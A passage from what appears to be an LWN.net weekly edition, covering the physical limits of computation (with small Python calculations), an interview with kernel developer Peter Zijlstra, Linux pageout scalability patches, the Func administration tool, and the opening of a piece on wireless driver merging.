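The difference between the two doubling periods compounds quickly, which is why the exact period matters so much in any long-range extrapolation.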


But Moore's Law is inherently a statement about human ingenuity,
market forces, and physics.  Whenever exponential growth falters in
one area - clock speed, or a particular mask technique - engineers
find some new area or new technique to improve at an exponential pace.
No individual technique experiences exponential growth for long;
instead, migration to new techniques occurs fast enough that the
overall growth rate continues to be exponential.


The discovery and improvement of manufacturing techniques is driven on
one end by demand for computation and limited on the other end by
physics.  In between is a morass of politics, science, and plain old
engineering.  It's hard to understand the myriad forces driving demand
and the many factors that affect innovation, including economies of scale,
cultural attitudes towards new ideas, vast marketing campaigns, and the
strange events that occur during the death throes of megacorporations.
By comparison, understanding the limits of computation is
easy, as long as you have a working knowledge of quantum physics,
information theory, and the properties of black holes.

The "Ultimate Laptop"

In a paper published in Nature in 2000,
Ultimate
Physical Limits of Computation (free
arXiv preprint
[PDF] here), Dr. Seth Lloyd calculates (and explains) the limits of
computing given our current knowledge of physics.  Of course, we don't
know everything about physics yet - far from it - but just as in other
areas of engineering, we know enough to make some extremely
interesting predictions about the future of computation.  This paper
wraps up existing work on the physical limits of computing and
introduces several novel results, most notably the ultimate speed
limit to computation.  Most interesting in my mind is the calculation
of a surprisingly specific upper bound on how many years a generalized
Moore's Law can remain in effect (keep reading to find out exactly how
long!).


Dr. Lloyd begins by assuming that we have no idea what future computer
manufacturing technology will look like.  Many discussions of the
future of Moore's Law center around physical limits on particular
manufacturing techniques, such as the limit on feature size in optical
masks imposed by the wavelength of light.  Instead, he ignores
manufacturing entirely and uses several key physical constants: the
speed of light c, Planck's reduced constant h
(normally written as h-bar, a symbol not available in standard HTML,
so you'll have to just imagine the bar), the gravitational
constant G, and Boltzmann's constant k_B.  These
constants and our current limited understanding of general relativity
and quantum physics are enough to derive many important limits on
computing.  Thus, these results don't depend on particular
manufacturing techniques.


The paper uses the device of the "Ultimate Laptop" to help make the
calculations concrete.  The ultimate laptop is one kilogram in mass
and has a volume of one liter (coincidentally almost exactly the same
specs as a 2008 Eee PC), and
operates at the maximum physical limits of computing.  Applying the
limits to the ultimate laptop gives you a feel for the kind of
computing power you can get in luggable format - disregarding battery
life, of course.

Energy limits speed

So, what are the limits?  The paper begins with deriving the ultimate
limit on the number of computations per second.  This depends on the
total energy, E, of the system, which can be calculated using
Einstein's famous equation relating mass and energy, E =
mc^2. (Told you we'd need to know the speed of light.)
Given the total energy of the system, we then need to know how quickly
the system can change from one distinguishable state to another -
i.e., flip bits.  This turns out to be limited by the Heisenberg
uncertainty principle.  Lloyd has this to say about the Heisenberg
uncertainty principle:


In particular, the correct interpretation of the time-energy
Heisenberg uncertainty principle ΔEΔt ≥ h
is not that it takes time Δt to measure energy to an accuracy
ΔE (a fallacy that was put to rest by Aharonov and Bohm) but
rather that a quantum state with spread in energy ΔE takes
time at least Δt = πh/2ΔE to evolve to an
orthogonal (and hence distinguishable) state. More recently, Margolus
and Levitin extended this result to show that a quantum system with
average energy E takes time at least Δt = πh/2E
to evolve to an orthogonal state.


In other words, the Heisenberg uncertainty principle implies that a
system will take a minimum amount of time to change in some observable
way, and that the time is related to the total energy of the system.
The result is that a system of energy E can
perform 2E/πh logical operations per second (a logical
operation is, for example, performing the AND operation on two bits of
input - think of it as single bit operations, roughly).  Since the
ultimate laptop has a mass of 1 kilo, it has energy 
E = mc2 = 8.9874 x 1016 joules.  The ultimate
laptop can perform a maximum of 5.4258 x 1050 operations
per second.
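
The arithmetic above is easy to check.  The following is a minimal
sketch, assuming CODATA values for the speed of light and the reduced
Planck constant (ħ, about 1.0546 x 10^-34 joule-seconds), which is the
value that reproduces the figure quoted above.  The function name is
made up for illustration.

```python
import math

C = 299_792_458.0          # speed of light in m/s (exact by definition)
HBAR = 1.054_571_817e-34   # reduced Planck constant in J*s (CODATA 2018)

def max_ops_per_second(mass_kg):
    """Upper bound on logical operations per second: 2E / (pi * hbar)."""
    energy = mass_kg * C ** 2              # E = mc^2, in joules
    return 2.0 * energy / (math.pi * HBAR)

energy_joules = 1.0 * C ** 2               # the one-kilo ultimate laptop
ops = max_ops_per_second(1.0)

print(f"E   = {energy_joules:.4e} J")
print(f"ops = {ops:.4e} per second")
```

The results differ from the article's numbers only in the last digit or
two, which is what one would expect if the paper rounded the speed of
light before squaring it.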


How close are we to the 5 x 10^50 operations per second
today?  Each of these operations is basically a single-bit operation,
so we have to convert current measurements of performance to their
single-bit operations per second equivalents.  The most commonly
available measure of operations per second is FLOPS (floating point
operations per second) as measured by LINPACK (see the Wikipedia page
on FLOPS).  Estimating the exact number of actual physical single-bit
operations involved in a single 32-bit floating point operation would
require proprietary knowledge of the FPU implementation.  The number
of FLOPS as reported by LINPACK varies wildly depending on compiler
optimization level as well.  For this article, we'll make a wild
estimate of 1000 single-bit operations per second (SBOPS) per FLOPS,
and ask anyone with a better estimate to please post it in a comment.


With our FLOPS to SBOPS conversion factor of 1000, the current LINPACK
record holder, the Roadrunner supercomputer (near my home town,
Albuquerque, New Mexico), reaches speeds of one petaflop, or
1000 x 10^15 = 1 x 10^18 SBOPS.  But that's for an entire
supercomputer - the ultimate laptop is only one kilo in mass and one
liter in volume.  Current laptop-friendly CPUs are around one
gigaflop, or 10^12 SBOPS, leaving us about 39 orders of
magnitude to go before hitting the theoretical physical limit of
computational speed.  Finally, existing quantum computers have already
attained the ultimate limit on computational speed - on a very small
number of bits and in a research setting, but attained it nonetheless.
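
The conversion and the resulting gap can be written down as a short
sketch.  The factor of 1000 is the article's own wild estimate; the
function name and the default limit argument are illustrative choices.

```python
import math

SBOPS_PER_FLOPS = 1000   # the article's admittedly rough conversion factor

def orders_of_magnitude_to_limit(flops, limit_sbops=5.4258e50):
    """How many powers of ten separate a machine from the speed limit."""
    sbops = flops * SBOPS_PER_FLOPS
    return math.log10(limit_sbops / sbops)

roadrunner_gap = orders_of_magnitude_to_limit(1e15)   # one petaflop
laptop_gap = orders_of_magnitude_to_limit(1e9)        # one gigaflop

print(f"Roadrunner: about {roadrunner_gap:.1f} orders of magnitude to go")
print(f"Laptop:     about {laptop_gap:.1f} orders of magnitude to go")
```

Rounding the laptop figure up gives the 39 orders of magnitude used in
the text.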

Entropy limits memory

What we really want to know about the ultimate laptop is how many
legally purchased DVDs we can store on it.  The amount of data a
system can store is a function of the number of distinguishable
physical states it can take on - each distinct configuration of memory
requires a distinct physical state.  According to Lloyd, we have
"known for more than a century that the number of accessible states of
a physical system, W, is related to its thermodynamic entropy
by the formula: S = k_B ln W" (S is the thermodynamic
entropy of the system).  This means we can calculate the number of bits
the ultimate laptop can store if we know what its total entropy is.


Calculating the exact entropy of a system turns out to be hard.  From
the paper:


To calculate exactly the maximum entropy for a kilogram of matter in a
liter volume would require complete knowledge of the dynamics of
elementary particles, quantum gravity, etc. We do not possess such
knowledge. However, the maximum entropy can readily be estimated by a
method reminiscent of that used to calculate thermodynamic quantities
in the early universe.  The idea is simple: model the volume occupied
by the computer as a collection of modes of elementary particles with
total average energy E.


The following discussion is pretty heavy going; for example, it
includes a note that baryon number may not be conserved in the case of
black hole computing, something I'll have to take Lloyd's word on.  But
the end result is that the ultimate laptop, operating at maximum
entropy, could store at least 2.13 x 10^31 bits.  Of course,
maximum entropy means that all of the laptop's matter is converted to
energy - basically, the equivalent of a thermonuclear explosion.  As
Lloyd notes, "Clearly, packaging issues alone make it unlikely that
this limit can be obtained."  Perhaps a follow-on paper can discuss
the Ultimate Laptop Bag...


How close are modern computers to this limit?  A modern laptop in 2008
can store up to 250GB - about 2 x 10^12 bits.  We're about
19 orders of magnitude away from maximum storage capacity, or about 64
more doublings in capacity.  Disk capacity as measured in bits per
square inch has doubled about 30 times between 1956 and 2005, and at
this historical rate, 64 more doublings will only take about 50 - 100
years.  This
isn't the overall limit on Moore's law as applied to computing, but it
suggests the possibility of an end to Moore's law as applied to
storage within some of our lifetimes.  I guess we file system
developers should think about second careers...
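
The doubling estimate can be reproduced with a few lines of arithmetic.
This is a sketch that assumes a steady doubling rate taken straight
from the 1956-2005 figures above; the variable names are illustrative.

```python
import math

current_bits = 250e9 * 8     # a 250GB laptop disk, about 2 x 10^12 bits
limit_bits = 2.13e31         # maximum-entropy storage limit from the paper

# Number of times capacity must double to reach the limit.
doublings_needed = math.log2(limit_bits / current_bits)

# Historical pace: about 30 doublings between 1956 and 2005.
years_per_doubling = (2005 - 1956) / 30
years_needed = doublings_needed * years_per_doubling

print(f"doublings needed: {doublings_needed:.1f}")
print(f"years at the historical rate: {years_needed:.0f}")
```

With these inputs the answer lands at roughly a century, the upper end
of the range given in the text.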

Redundancy and error correction

Existing computers don't approach the physical limits of computing for
many good reasons.  As Lloyd wryly observes, "Most of the energy [of
existing computers] is locked up in the mass of the particles of which
the computer is constructed, leaving only an infinitesimal fraction
for performing logic."  Storage of a single bit in DRAM uses "billions
and billions of degrees of freedom" - electrons, for example - instead of
just one degree of freedom.  Existing computers tend to conduct
computation at temperatures at which matter remains in the form of
atoms instead of plasma.


Another fascinating practical limit on computation is the error rate
of operations, which is bounded by the rate at which the computer can
shed heat to the environment.  As it turns out, logical operations
don't inherently require the dissipation of energy, as von Neumann
originally theorized.  Reversible operations (such as NOT) which do
not destroy information do not inherently require the dissipation of
energy, only irreversible operations (such as AND).  This makes some
sense intuitively; the only way to destroy (erase) a bit is to turn
that information into heat, otherwise the bit has just been moved
somewhere else and the information it represents is still there.
Reversible computation has been implemented and shown to have
extremely low power dissipation.
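
The distinction between reversible and irreversible operations can be
made concrete: a gate is logically reversible when no two inputs
produce the same output, so the input can always be recovered.  The
sketch below checks that property by brute force.  The controlled-NOT
gate is an extra example that is not discussed in the text, and all of
the function names are illustrative.

```python
from itertools import product

def is_reversible(gate, n_inputs):
    """True if distinct inputs always give distinct outputs."""
    inputs = list(product((0, 1), repeat=n_inputs))
    outputs = {gate(*bits) for bits in inputs}
    return len(outputs) == len(inputs)

def not_gate(a):
    return (1 - a,)

def and_gate(a, b):
    # Three of the four inputs map to 0, so information is destroyed.
    return (a & b,)

def cnot_gate(a, b):
    # Controlled-NOT: flips b when a is 1 and passes a through unchanged.
    return (a, a ^ b)

for name, gate, n in (("NOT", not_gate, 1),
                      ("AND", and_gate, 2),
                      ("CNOT", cnot_gate, 2)):
    print(name, "reversible" if is_reversible(gate, n) else "irreversible")
```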


Of course, some energy will always be dissipated, whether or not the
computation is reversible.  However, the erasure of bits - in
particular, errors - requires a minimum expenditure of energy.  The
rate at which the system can "reject errors to the environment" in the
form of heat limits the rate of bit errors in the system; or,
conversely, the rate of bit errors combined with the rate of heat
transfer out of the system limits the rate of bit operations.  Lloyd
estimates the rate at which the system can reject error bits to the
environment, relative to the surface area and assuming black-body
radiation, as 7.195 x 10^42 bits per meter^2 per
second.

Computational limits of "smart dust"

Right around the same time that I read the "Ultimate Limits" paper, I
also read A Deepness in the Sky by Vernor Vinge, one of many science
fiction
books featuring some form of "smart dust."  Smart dust is the concept
of tiny computing elements scattered around the environment which
operate as a sort of low-powered distributed computer.  The smart dust
in Vinge's book had enough storage for an entire systems manual, which
initially struck me as a ludicrously large amount of storage for
something the size of a grain of dust.  So I sat down and calculated the
limits of storage and computation for a computer one μm^3
in size, under the constraint that its matter remain in the form of
atoms (rather than plasma).


Lloyd calculates that, under these conditions, the ultimate laptop
(one kilogram in one liter) can store about 10^25 bits and
conduct 10^40 single-bit operations per second.  The
ultimate laptop is one liter and there are 10^15
μm^3 in a liter.  Dividing the total storage and
operations per second by 10^15 gives us 10^10 bits
and 10^25 operations per second - about 1 gigabyte in data
storage and so many FLOPS that the prefixes are meaningless.
Basically, the computing potential of a piece of dust far exceeds the
biggest supercomputer on the planet - sci-fi authors, go wild!  Of
course, none of these calculations take into account power delivery or
I/O bandwidth, which may well turn out to be far more important limits
on computation.
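
The scaling from one liter down to one cubic micrometer is a unit
conversion followed by a division.  The sketch below assumes, as the
text does, that storage and speed scale linearly with volume; the
variable names are illustrative.

```python
LITER_IN_CUBIC_METERS = 1e-3
CUBIC_MICRON_IN_CUBIC_METERS = (1e-6) ** 3

cubic_microns_per_liter = LITER_IN_CUBIC_METERS / CUBIC_MICRON_IN_CUBIC_METERS

# Atom-based (non-plasma) limits for the one-liter ultimate laptop.
laptop_bits = 1e25
laptop_ops_per_second = 1e40

dust_bits = laptop_bits / cubic_microns_per_liter
dust_ops_per_second = laptop_ops_per_second / cubic_microns_per_liter
dust_gigabytes = dust_bits / 8 / 1e9

print(f"cubic microns per liter: {cubic_microns_per_liter:.0e}")
print(f"dust storage: {dust_bits:.0e} bits ({dust_gigabytes:.2f} GB)")
print(f"dust speed:   {dust_ops_per_second:.0e} operations per second")
```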

Implications of the ultimate laptop

Calculating the limits of the ultimate laptop has been a lot of fun,
but what does it mean for computer science today?  We know enough now
to derive a theoretical upper bound for how long a generalized Moore's
Law can remain in effect.  Current laptops store 10^12 bits
and conduct 10^12 single-bit operations per second.  The
ultimate laptop can store 10^31 bits and conduct
10^51 single-bit operations per second, a gap of a factor of
10^19 and 10^39 respectively.  Lloyd estimates the
rate of Moore's Law as 10^8 factor of improvement in areal
bit density over the past 50 years.  Assuming that both storage
density and computational speed will improve by a factor of
10^8 per 50 years, the limit will be reached in about 125
years for storage and about 250 years for operations per second.  One
imagines the final 125 years being spent frantically developing better
compression algorithms - or advanced theoretical physics research.
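
The two time estimates follow directly from the assumed rate of eight
orders of magnitude per 50 years.  A minimal sketch, with an
illustrative function name:

```python
YEARS_PER_PERIOD = 50
ORDERS_PER_PERIOD = 8    # a factor of 10^8 every 50 years

def years_to_close_gap(orders_of_magnitude):
    """Years needed to improve by the given number of powers of ten."""
    return orders_of_magnitude / ORDERS_PER_PERIOD * YEARS_PER_PERIOD

storage_years = years_to_close_gap(19)   # 10^12 -> 10^31 bits
speed_years = years_to_close_gap(39)     # 10^12 -> 10^51 operations/second

print(f"storage limit reached in about {storage_years:.0f} years")
print(f"speed limit reached in about {speed_years:.0f} years")
```

The exact results are a little under the rounded 125 and 250 years
given in the text.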


Once Moore's Law comes to a halt, the only way to increase computing
power will be to increase the mass and volume of the computer, which
will also encounter fundamental limits.  An unpublished paper entitled
Universal Limits on
Computation estimates that the entire computing capacity of the
universe would be exhausted after only 600 years under Moore's Law.


250 years is a fascinating in-between length of time.  It's too far
away to be relevant to anyone alive today, but it's close enough that
we can't entirely ignore it.  Typical planning horizons for long-term
human endeavors (like managing ecosystems) tend to max out around 300
years, so perhaps it's not unthinkable to begin planning for the end
of Moore's Law.  Me, I'm going to start work on the LZVH compression
algorithm, tomorrow.


One thing is clear: we live in the Golden Age of computing.  Let's
make the most of it.


Valerie Henson is a Linux consultant
    specializing in file systems and owns a one kilo, one liter laptop.


		Peter Zijlstra: From DOS to kernel hacking


In a linux-kernel thread about fixing the Kernel Janitors project, Peter
Zijlstra spoke up, with a bit of his
perspective on attracting better kernel contributors.  As he is a
relatively recent addition to the kernel community, his path from Linux
user to kernel hacker may serve as a template of sorts for others who are
starting out now.  We asked Peter to answer a few questions by email to
help fill in some more of the details.


LWN: How did you get started with Linux?  What attracted you?


Peter: Around the time Win95 came around, IIRC [if I remember
correctly]. I used to do demo coding on DOS, which involved rebooting
your machine every time you messed up, and whereas DOS reboots quite
quickly, doing the same on Win95 was anything but quick.

A friend of mine introduced me to Unix/Linux at the time, and I started
learning all about programming in a real environment. Basically all
programming up to that point was in a freestanding environment where you
had to poke the hardware to get anything done.

So initially it was the charm of a proper multitasking OS (with memory
protection) that got me to use it – not having to reboot your machine
every time, and the luxury of being able to run a debugger.


LWN: How quickly did you start poking around in the kernel?  What
did you first start to look at and why?  


Peter: The kernel ... well that took a seriously long while. The
above introduction to Linux was around 95/96 IIRC. My first real kernel
patches were about 10 years later.

In those 10 years I learnt a lot about programming. I learnt about Unix
system programming, I learnt about C++, multi-threading, database
engines, and a whole range of interesting things.

Somewhere along I got a real internet connection and started lurking on
mailing lists, including LKML – I must have been reading that on and off
for about 5 years by the time I really sat down and wrote some patches.

During that time I might have sent in some trivial build fixes, and I
remember finding a priority leak in one of the realtime patches. But I
wasn't actively coding on the kernel – I just liked running real exotic
stuff, you know Gentoo and building just about everything from CVS.

So what got me started on the kernel ... I can't quite remember how it
happened, but I ran into some of Rik's [van Riel] Advanced Page Replacement
stuff. 
I had worked on that problem space earlier while doing database engines,
and had recently run into it again at work. So I started reading those
papers and some of the proposed kernel patches, and I started to itch.

I dropped basically everything I was working on in my spare time
(hacking WindowMaker, writing a C++ ASN.1-DER serialization class,
writing a new LDAP server and I'm sure some other projects that are
rotting away on a harddrive somewhere  :-)  and started hacking.

Why ... I'm not sure – it sure got me back to where I started out –
crashing machines (and boot times haven't improved over those past 10
years at all).

I think because of the challenge – I knew I could write whatever it was
I was coding and this page replacement stuff was a whole new challenge,
and TBH [to be honest] the kernel code didn't look too hard at the time
(phew how ignorant I was..)


LWN: How well were your contributions received by kernel hackers?
Did you make any missteps along the way? 


Peter: Some better than others. I think it's natural for every kernel
hacker to grow a huge pile of discarded patches. Not everything will
make it. But don't get discouraged by that, you did get to learn
something from doing them.

Mis-steps, feh, still do  ;-)  Unlike most people seem to think, kernel
hackers are human too.


LWN: What suggestions do you have for folks that are looking at
getting involved in kernel hacking today? 


Peter: Just do it – seriously it's that easy. Oh and don't be afraid of
criticism, you'll get it anyway – in spades. Criticism is not personal,
it's about your patch, there are two things you can do:


take it and act upon it
convince the other he's wrong


OK it can get personal, but that is only if you repeatedly fail the
above two points.


LWN: There has been a lot of talk about the Kernel Janitors project
recently, do you think that is a good way to get started with kernel
development?  What do you think should be done differently in that (or
other) project(s) to attract more and better contributors? 


Peter: I'm not sure. The Kernel Janitors thing doesn't really seem to
work out. I think that might be due to two things:


we don't have enough simple but interesting things lined up (not
saying there are none, but we don't have a ready list). I think a proper
challenging project would be much better than moronic code clean ups.
the kernel really isn't a place for newbies; now let me explain this
before it gets all mis-interpreted  :-)

Things really get a lot easier if you're fairly competent at (Unix)
system programming before starting at the kernel.
Kernel hacking is a solitary business in that you need to do
things, nobody is going to do them for you. That is not saying nobody
can help you if you have a question. Also, nobody is going to force you
to do something – you need to want doing it.


Now, none of this means you can't start hacking the kernel without
knowing C or any programming at all, but you'd better be ready for one
hell of a ride (Yes, there are people who learnt C from doing kernel
stuff, but that is going to take a serious amount of will-power to pull
off).

So I guess what I'm saying is that you need to really want to do it.
There is no other way to become a kernel hacker than by simply doing it.


LWN: Do you work on Linux for your job, as a hobby, or both?


Peter: Both; initially it was spare time besides $JOB. But after
keeping this up for about a year my wife nudged me to look for a kernel
job, since I obviously enjoyed hacking the kernel more than $JOB, and
she'd get some of that spare time back  ;-)

So I applied for a kernel position at a few of the larger vendors, and
Red Hat won the race.

Already having had a year's worth of exposure to kernel code and LKML,
certainly helped in getting this amazing opportunity. Have I already
mentioned I absolutely love working on the kernel?

So now I get to poke at the kernel all day, every day... 


LWN: What are your current kernel projects?  What kinds of things do
you see yourself doing in the kernel in the future? 


Peter: Current active projects are group scheduling and some -rt
work. I should pick up the swap over network code again, and there are
some other loose ends.

The future ... well we'll see what happens, loads of interesting stuff to
do.


We would like to thank Peter for taking the time to answer our questions.

		The state of the pageout scalability patches


The virtual memory scalability improvement patch set overseen by Rik van
Riel has been under construction for well over a year; LWN last looked at it in November,
2007.  Since then, a number of new features have been added and the patch
set, as a whole, has gotten closer to the point where it can be considered
for mainline inclusion.  So another look would appear to be in order.


One of the core changes in this patch set remains the same: it still
separates the least-recently-used (LRU) lists for pages backed up by files
and those backed up by swap.  When memory gets tight, it is generally
preferable to evict page cache pages (those backed up by files) rather than
anonymous memory.  File-backed pages are less likely to need to be written
back to disk and they are more likely to be well laid-out on disk, making
it quicker to read them back in if necessary.  Current Linux kernels keep
both types of pages on the same LRU list, though, forcing the pageout code
to scan over (potentially large numbers of) pages which it is not
interested in evicting.  Rik's patch improves this situation by splitting
the LRU list in two, allowing the pageout code to only look at pages which
might actually be candidates for eviction.
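
The cost of a shared list can be illustrated with a toy model.  This is
only a sketch in Python, not the kernel's C implementation; the page
representation, the list names and the scanning function are all
invented for illustration.

```python
from collections import deque

def scan_for_file_pages(lru, wanted):
    """Walk an LRU list from the cold end; return (evicted, pages_scanned)."""
    evicted, scanned = [], 0
    for page in lru:
        if len(evicted) == wanted:
            break
        scanned += 1
        if page[0] == "file":
            evicted.append(page)
    return evicted, scanned

# Toy workload: 1000 anonymous pages sit ahead of 10 file-backed pages.
pages = [("anon", i) for i in range(1000)] + [("file", i) for i in range(10)]

mixed_lru = deque(pages)                                # one shared list
file_lru = deque(p for p in pages if p[0] == "file")    # split: file-backed
anon_lru = deque(p for p in pages if p[0] == "anon")    # split: anonymous

_, mixed_scanned = scan_for_file_pages(mixed_lru, wanted=5)
_, split_scanned = scan_for_file_pages(file_lru, wanted=5)

print(f"shared list: scanned {mixed_scanned} pages to evict 5")
print(f"split lists: scanned {split_scanned} pages to evict 5")
```

In this contrived layout the shared list forces the scanner past every
anonymous page, while the split file list yields its candidates
immediately and the anonymous list is never touched.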


There comes a point, though, where anonymous pages need to be reclaimed as
well.  The kernel will make an effort to pick the best pages to evict by
going for those which have not been recently referenced.  Doing that,
however, requires going through the entire list of anonymous pages,
clearing the "referenced" bit on each.  A large system can have many
millions of anonymous pages; iterating over the entire set can take a long
time.  And, as it turns out, it's not really necessary.


The VM scalability patch set now changes that behavior by simply keeping a
certain percentage of the system's anonymous pages on the inactive list -
the first place the system looks for pages to evict.  Those pages will
drift toward the front of the list over time, but will be returned to the
active list if they are used.  Essentially, this patch is applying a form
of the "referenced" test to a portion of anonymous memory - whether or not
anonymous pages are being evicted at the time - rather than trying to check
the referenced state of all anonymous pages when the kernel decides it
needs to reclaim some of them.


Another set of patches addresses a different situation: pages which cannot
be evicted at all.  These pages might have been locked into memory with a
system call like mlock(), be part of a locked SYSV shared memory
region, or be part of a RAM disk, for example.  They can be either page
cache or anonymous pages.  Either way, there is little point in having the
reclaim code scan them, since it will not be possible to evict them.  But,
of course, the current reclaim code does have to scan over these pages.


This unneeded scanning, as it turns out, can be a problem.  The extensive
unevictable LRU document included with the
patch claims:


	For example, a non-numal x86_64 platform with 128GB of main memory
	will have over 32 million 4k pages in a single zone.  When a large
	fraction of these pages are not evictable for any reason [see
	below], vmscan will spend a lot of time scanning the LRU lists
	looking for the small fraction of pages that are evictable.  This
	can result in a situation where all cpus are spending 100% of their
	time in vmscan for hours or days on end, with the system completely
	unresponsive.


Most of us are not currently working with systems of this size; one must
spend a fair amount of money to gain the benefits of this sort
of pathological behavior.  Still, it seems like something which is worth
fixing. 

The solution, of course, is yet another list.  When a page is determined to
be unevictable, that page will go onto the special, per-zone unevictable
list, after which the pageout code will simply not see it anymore.  As a
result of the variety of ways in which a page can become unevictable, the
kernel will not always know at mapping time whether a specific page can go
onto the unevictable list or not.  So the pageout code must keep an eye out
for those pages as it scans for reclaim candidates and shunt them over to
the unevictable list as they are found.  In relatively short order, the
locked-down pages will accumulate in this list, freeing the pageout code to
concentrate on pages it can actually do something about.
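
The effect of the extra list can be sketched with a toy model.  This is
illustrative Python, not the kernel code: the Zone class, its fields
and the "locked" flag are invented names, and real pages become
unevictable in more ways than a single flag can express.

```python
PAGE_SIZE = 4 * 1024
pages_in_128gb = 128 * 1024 ** 3 // PAGE_SIZE   # size of the quoted example

class Zone:
    def __init__(self, pages):
        self.lru = list(pages)     # pages the pageout code scans
        self.unevictable = []      # pages it no longer looks at

    def reclaim_scan(self):
        """One pass: cull locked pages, return (candidates, pages_scanned)."""
        scanned = len(self.lru)
        candidates = []
        for page in self.lru:
            if page["locked"]:
                self.unevictable.append(page)   # shunted aside for good
            else:
                candidates.append(page)
        self.lru = candidates
        return candidates, scanned

# 1000 pages, of which 900 are locked into memory.
zone = Zone([{"id": i, "locked": i % 10 != 0} for i in range(1000)])
_, first_pass = zone.reclaim_scan()
_, second_pass = zone.reclaim_scan()

print(f"4k pages in 128GB: {pages_in_128gb:,}")
print(f"first pass scanned {first_pass}, second pass scanned {second_pass}")
```

After the first pass has moved the locked pages aside, later passes
only touch the pages that can actually be reclaimed.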


Many of the concerns which have been raised about this patch set over the
last year have been addressed.  A few remain, though.  Some of the new
features require new page flags; these flags are in extremely short supply,
so there is always pressure to find ways of implementing things which do
not allocate more of them.  There are a few too many configuration options
and associated #ifdef blocks.  And so on.  Addressing these may
take a while, but convincing everybody that these (rather fundamental) memory
management changes are beneficial under all circumstances may take rather
longer.  So, while this patch set is making progress, a 2.6.27 merge is
probably not in the cards.

		Multi-system administration with Func


Managing multiple computer systems can involve a lot of repetitive tasks:
connecting to each, performing some update, status check, or configuration
tweak, and then moving on to the next machine.  These kinds of things
can be scripted of course, but scripts of that nature typically need to
be adjusted frequently as machines come and go or the tasks change.  The
Fedora Unified Network Controller
(Func) is a tool that will help simplify system administration, but there
is more to it than that—it is a framework for doing two-way secure
communication, from the command line, scripts, or applications.


Func is written in Python, providing an API for scripts written in that
language, but it can also be used from the command line.  Each client
machine—minion in Func-speak—runs the funcd
daemon which contacts the master server or overlord.  From the
overlord machine, commands can then be issued to individual minions or to
subsets of them.  Some of the power of Func can be seen in simple
one-line commands, such as one which will restart the web server on all
of the minions.


Similar kinds of tasks—but with more control—can be handled
through the Python API.  A somewhat contrived example from the Func website
gives a sense of what can be done: it looks for minions that are running
a web server and reboots each that it finds.
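
The flow described above (query every minion, then act on the ones that
match) can be sketched without Func installed.  The classes below are
hypothetical stand-ins written for this illustration and are not Func's
API; the host names are made up, and the status codes follow the usual
init-script convention in which 0 means "running".

```python
from fnmatch import fnmatch

class FakeMinion:
    """Stand-in for a managed host; not part of Func."""
    def __init__(self, name, httpd_running):
        self.name = name
        self.httpd_running = httpd_running
        self.rebooted = False

    def service_status(self, service):
        # 0 means the service is running, 3 means it is not.
        return 0 if (service == "httpd" and self.httpd_running) else 3

    def reboot(self):
        self.rebooted = True

class FakeOverlord:
    """Hypothetical dispatcher: runs a method on each minion matching a glob."""
    def __init__(self, minions):
        self.minions = {m.name: m for m in minions}

    def call(self, pattern, method, *args):
        return {name: getattr(minion, method)(*args)
                for name, minion in self.minions.items()
                if fnmatch(name, pattern)}

overlord = FakeOverlord([
    FakeMinion("web1.example.org", httpd_running=True),
    FakeMinion("web2.example.org", httpd_running=True),
    FakeMinion("db1.example.org", httpd_running=False),
])

# Ask every minion about its web server, then reboot those running one.
statuses = overlord.call("*", "service_status", "httpd")
for host, status in statuses.items():
    if status == 0:
        overlord.call(host, "reboot")

rebooted = sorted(n for n, m in overlord.minions.items() if m.rebooted)
print(rebooted)
```

The design point is that results come back as a mapping from host name
to return value, so a script can make a per-host decision before
issuing the next command.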


Managing keys can be a hassle when using ssh as an
administrative tool, so Func uses another tool, Certmaster, to assist with
keys.  Certmaster provides a set of utilities and a Python API for managing
SSL certificates.  Clients generate certificate signing requests (CSRs),
which contain their public key,
that are sent to the Certmaster on the overlord.  Administrators can either
sign them from the command line or enable auto-signing.  The minion then
retrieves the signed certificate so that the overlord and minion
communicate over an encrypted channel after that.   


Func is not meant to replace ssh; instead, it is intended to
provide multi-system and scripting capabilities which are not the strengths of
ssh.  Like ssh, though, Func is meant to be easy to
deploy (eventually ubiquitous, at least for Fedora), simple to use,
and easy to extend.  It also has a pluggable architecture that allows
Python modules to be integrated easily into Func, expanding the abilities
of the minions.  The documentation
shows how to use the func-create-module command to generate
template code which allows the administrator to ignore the Func
requirements and concentrate on the task at hand.


There is nothing particularly Fedora-specific about Func; that's just where
it was born.  There are some efforts underway to add it for other
distributions.  Most of the work would be in creating distribution-specific
analogs for things like restarting services and querying hardware
configurations. 


Red Hat has been releasing a steady stream of system administration tools
over the last year or so.  The Emerging Technology (ET) group
has developed quite an ecosystem of tools to support installations with
large numbers of servers that are frequently installed and upgraded.  One
might think they have a large infrastructure of such servers.


One of those tools that is frequently discussed in conjunction with Func is Cobbler.  It is meant to simplify
the configuration of a server to handle network installation and booting
for a large server farm.  From the web page:

In short, Cobbler helps build and maintain network installation
infrastructure really easily. It's highly customizable to your particular
methods of operation through a wide variety of options, a powerful command
line, a Web interface, a pluggable extension mechanism, and (for
developers) its own Python API. Cobbler lets administrators forget how
software gets installed and delivered and lets them concentrate instead on
what they want to install where.


Cobbler and the other tools coming out of the ET group are not just
targeted at physical machines, but also virtualized environments.  By using
Cobbler, the puppet configuration
manager, and the oVirt virtual machine
manager, thousands of systems of various kinds can be managed in a
centralized fashion.  As would be expected, all of the code is available
as free software. 


These tools are quite interesting for system administrators, particularly
those who use Fedora and have lots of systems to maintain.  Even for small
home networks, though, Func at least could come in handy.  For overworked
administrators—no matter the size of their domain—better tools
are always welcome.


		Why some drivers are not merged early


Arjan van de Ven's kernel oops report always makes for interesting reading;
it is a quick summary of what is making the most kernels crash over the
past week.  It thus points to where some of the most urgent bugs are to be
found.  Sometimes, though, this report can raise larger issues as well.
Consider the June 16
report, which notes that quite a few kernel crashes were the result of
a not-quite-ready wireless update shipped by Fedora.  Ingo Molnar was quick
to jump on this report with a
process-related complaint:


	i suspect Fedora has done this to enable more hardware, and/or to
	fix mainline wireless bugs?  I wish we would do such new driver
	merging in mainline instead, so that we had a single point of
	testing and single point of effort.

	Same for Nouveau: Fedora carries it and i dont understand why such
	a major piece of work is not done in mainline and not _helped by_
	mainline.


He then took the discussion further with
this observation:


	That's my main point: when we mess up and dont merge OSS driver
	code that was out there in time - and we messed up big time with
	wireless - we should admit the screwup and swallow the bitter pill.


This comment drew some unhappy responses from the networking developers,
who feel that they have been unfairly targeted for criticism.  Wireless
drivers have been merged at the first real opportunity, they say, and
trying to put them in earlier would have only made things worse.  In fact,
your editor will submit that mistakes were made with wireless
drivers, but those mistakes have little to do with delaying their inclusion
into the mainline.  What went wrong with wireless is this:


 Early wireless developers did not really try to solve the wireless 
     networking problem; they just wanted to get their adaptor to work.
     Wireless maintainer John Linville once told your editor that, for
